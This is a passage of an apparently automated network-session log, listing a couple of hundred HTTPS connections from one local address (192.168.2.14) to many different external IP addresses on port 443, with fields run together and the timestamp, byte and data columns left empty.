                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      17270192.168.2.145201895.214.139.149443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      17271192.168.2.144394895.130.151.254443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      17272192.168.2.1434746213.104.249.20443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      17273192.168.2.1440694204.22.142.199443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      17274192.168.2.1444726114.158.10.39443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      17275192.168.2.1459742201.222.68.214443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      17276192.168.2.1452896173.128.137.242443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      17277192.168.2.1441166105.222.15.160443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      17278192.168.2.1450792167.71.11.14443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      17279192.168.2.146050675.150.142.119443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      17280192.168.2.14602981.42.46.101443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      17281192.168.2.143314493.163.53.229443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      17282192.168.2.145917412.32.4.72443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      17283192.168.2.145757292.245.88.35443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      17284192.168.2.1438918193.0.140.94443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      17285192.168.2.1436918168.167.51.230443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      17286192.168.2.1456080178.35.123.169443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      17287192.168.2.1445428180.64.205.84443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      17288192.168.2.143671493.125.43.153443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      17289192.168.2.1441104219.125.232.213443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      17290192.168.2.1453264140.235.113.179443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      17291192.168.2.14482081.37.188.216443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      17292192.168.2.1445834145.203.159.247443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      17293192.168.2.143830283.218.49.168443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      17294192.168.2.1453884137.8.215.70443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      17295192.168.2.143871232.244.83.160443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      17296192.168.2.143716886.42.16.173443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      17297192.168.2.144223661.250.35.147443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      17298192.168.2.1449512205.113.4.20443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      17299192.168.2.1444780180.86.38.97443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      17300192.168.2.144642047.138.25.126443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      17301192.168.2.1445706154.127.0.100443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      17302192.168.2.144249444.94.85.160443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      17303192.168.2.1436882134.12.151.52443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      17304192.168.2.145465696.195.152.199443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      17305192.168.2.1436826125.59.224.122443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      17306192.168.2.144761878.44.66.25443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      17307192.168.2.1459322186.95.54.101443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      17308192.168.2.1460732203.200.171.118443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      17309192.168.2.1435076178.191.37.81443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      17310192.168.2.143702860.182.57.48443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      17311192.168.2.143830058.138.219.8443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      17312192.168.2.1451034151.61.0.96443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      17313192.168.2.1433120149.219.58.105443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      17314192.168.2.144470049.40.181.149443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      17315192.168.2.1450084178.94.222.39443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      17316192.168.2.1450426176.12.95.86443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      17317192.168.2.1449340101.59.226.58443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      17318192.168.2.1441508149.220.63.50443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      17319192.168.2.1455162141.46.128.240443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      17320192.168.2.1452466120.69.30.5443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      17321192.168.2.1439906128.210.10.80443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      17322192.168.2.143483286.54.160.143443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      17323192.168.2.1451210213.253.10.84443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      17324192.168.2.1451538219.139.15.115443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      17325192.168.2.144339299.139.242.73443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      17326192.168.2.1445502200.13.252.232443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      17327192.168.2.1450878121.243.30.159443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      17328192.168.2.145560831.131.147.147443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      17329192.168.2.143429213.149.153.16443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      17330192.168.2.1447502195.96.8.147443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      17331192.168.2.1444218132.155.91.128443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      17332192.168.2.1460310220.33.4.53443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      17333192.168.2.1445504118.129.83.5443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      17334192.168.2.1460870216.78.139.84443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      17335192.168.2.1447906186.33.172.235443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      17336192.168.2.146078243.166.97.252443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      17337192.168.2.145094477.121.251.211443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      17338192.168.2.1434838212.156.156.224443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      17339192.168.2.1439766201.86.57.23443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      17340192.168.2.14593204.42.72.49443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      17341192.168.2.1448908103.110.225.199443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      17342192.168.2.143895677.179.51.61443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      17343192.168.2.1437370117.97.20.212443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      17344192.168.2.1436080121.144.246.246443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      17345192.168.2.144874688.121.133.123443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      17346192.168.2.143798427.113.47.234443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      17347192.168.2.1443830114.100.195.55443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      17348192.168.2.1441808168.134.6.76443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      17349192.168.2.1449714173.213.193.253443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      17350192.168.2.145398495.42.28.86443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      17351192.168.2.144468045.207.186.174443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      17352192.168.2.143811473.59.240.172443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      17353192.168.2.145549225.14.222.165443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      17354192.168.2.1450112111.203.137.128443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      17355192.168.2.1455570157.97.97.85443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      17356192.168.2.1451156153.136.150.94443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      17357192.168.2.144251472.48.45.88443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      17358192.168.2.145338252.116.60.251443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      17359192.168.2.145084212.152.142.110443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      17360192.168.2.145899048.47.211.198443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      17361192.168.2.1440428203.250.101.18443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      17362192.168.2.145263817.28.0.40443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      17363192.168.2.1450614201.36.127.116443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      17364192.168.2.1451010208.149.230.138443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      17365192.168.2.145775464.176.116.66443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      17366192.168.2.1450472112.59.28.88443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      17367192.168.2.1437004196.197.113.51443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      17368192.168.2.1456786103.224.110.114443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      17369192.168.2.1448450167.16.106.92443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      17370192.168.2.1440152146.48.44.40443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      17371192.168.2.1456792211.125.26.56443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      17372192.168.2.1458754135.183.78.144443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      17373192.168.2.1453410160.56.11.93443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      17374192.168.2.1453872151.93.135.55443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      17375192.168.2.145302483.102.151.119443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      17376192.168.2.145866219.13.206.100443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      17377192.168.2.144987631.188.225.107443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      17378192.168.2.1453326175.221.253.58443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      17379192.168.2.1434206121.233.221.136443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      17380192.168.2.143953673.5.65.147443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      17381192.168.2.1454406147.123.125.21443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      17382192.168.2.1435780168.180.241.31443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      17383192.168.2.145371690.253.116.159443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      17384192.168.2.145380264.90.82.123443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      17385192.168.2.1433970196.215.134.255443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      17386192.168.2.1450566177.220.74.242443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      17387192.168.2.145962482.85.184.81443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      17388192.168.2.146081052.250.68.195443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      17389192.168.2.144361688.100.119.196443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      17390192.168.2.1442786222.109.180.2443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      17391192.168.2.145595873.158.66.85443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      17392192.168.2.1455794203.131.250.47443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      17393192.168.2.1459604158.51.151.63443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      17394192.168.2.1449412158.78.224.123443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      17395192.168.2.1443838124.33.79.84443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      17396192.168.2.1433392140.215.241.170443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      17397192.168.2.1446406222.19.85.137443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      17398192.168.2.143326658.218.254.0443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      17399192.168.2.1453888211.144.93.232443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      17400192.168.2.144279049.138.10.184443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      17401192.168.2.144029618.204.150.205443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      17402192.168.2.144267858.98.38.242443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      17403192.168.2.1435506140.145.219.55443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      17404192.168.2.1437512210.3.9.217443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      17405192.168.2.145631489.143.31.0443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      17406192.168.2.1437064200.216.129.214443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      17407192.168.2.1440152163.148.164.115443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      17408192.168.2.1452592109.102.198.181443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      17409192.168.2.1445386144.229.50.70443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      17410192.168.2.145126637.157.171.121443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      17411192.168.2.1453986166.156.118.95443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      17412192.168.2.1449696126.112.109.48443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      17413192.168.2.1436606207.127.127.154443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      17414192.168.2.143365050.82.98.0443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      17415192.168.2.1440878143.220.54.130443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      17416192.168.2.143575282.233.182.26443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      17417192.168.2.1459556158.223.159.136443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      17418192.168.2.1459776158.158.34.135443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      17419192.168.2.14415909.222.217.199443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      17420192.168.2.1435822129.75.160.175443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      17421192.168.2.143585857.60.68.144443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      17422192.168.2.145674861.219.120.77443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      17423192.168.2.1448828202.98.230.79443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      17424192.168.2.1443398201.24.224.63443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      17425192.168.2.145352018.203.120.55443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      17426192.168.2.1447232131.174.89.104443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      17427192.168.2.1445488155.51.186.190443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      17428192.168.2.1441142178.211.204.81443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      17429192.168.2.1435416125.100.24.121443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      17430192.168.2.1457650132.208.38.44443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      17431192.168.2.1448738220.197.78.230443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      17432192.168.2.1460162200.110.228.54443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      17433192.168.2.1434884212.197.56.254443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      17434192.168.2.144871439.214.231.225443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      17435192.168.2.143961435.50.8.125443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      17436192.168.2.1453266191.230.201.86443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      17437192.168.2.1432774212.91.205.165443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      17438192.168.2.145427887.76.50.86443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      17439192.168.2.144483060.1.174.63443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      17440192.168.2.1451472192.186.200.232443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      17441192.168.2.1441516193.148.139.177443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      17442192.168.2.1447618115.13.198.183443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      17443192.168.2.145194053.253.189.160443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      17444192.168.2.1460594165.44.12.152443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      17445192.168.2.1452976188.179.228.132443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      17446192.168.2.145121461.46.52.69443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      17447192.168.2.14482008.29.184.0443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      17448192.168.2.144888443.56.111.2443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      17449192.168.2.1436992185.91.128.50443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      17450192.168.2.1456590191.26.219.219443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      17451192.168.2.145278487.104.164.108443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      17452192.168.2.1448338206.86.228.223443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      17453192.168.2.1452138136.234.163.21443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      17454192.168.2.1452034137.139.46.19443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      17455192.168.2.1446438209.181.164.22443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      17456192.168.2.1455482139.206.69.112443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      17457192.168.2.1457096221.251.152.79443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      17458192.168.2.144011268.230.167.144443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      17459192.168.2.1440892146.152.154.28443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      17460192.168.2.143761213.91.60.52443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      17461192.168.2.144314696.87.128.200443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      17462192.168.2.1440396170.24.230.206443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      17463192.168.2.144664231.98.100.81443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      17464192.168.2.1446590112.19.157.253443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      17465192.168.2.1444122151.222.240.34443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      17466192.168.2.1440386202.97.191.43443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      17467192.168.2.143824037.198.156.12443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      17468192.168.2.1447432205.137.186.24443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      17469192.168.2.145169498.99.153.42443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      17470192.168.2.14481189.58.50.104443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      17471192.168.2.1458378223.4.121.10443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      17472192.168.2.1447136207.90.82.253443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      17473192.168.2.1458262104.11.57.129443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      17474192.168.2.146098284.15.252.200443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      17475192.168.2.1455246122.132.94.43443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      17476192.168.2.145803897.12.29.52443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      17477192.168.2.1441270210.139.245.184443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      17478192.168.2.1447012164.96.130.161443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      17479192.168.2.1444304123.194.168.151443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      17480192.168.2.144851081.192.78.157443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      17481192.168.2.1433760138.122.1.65443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
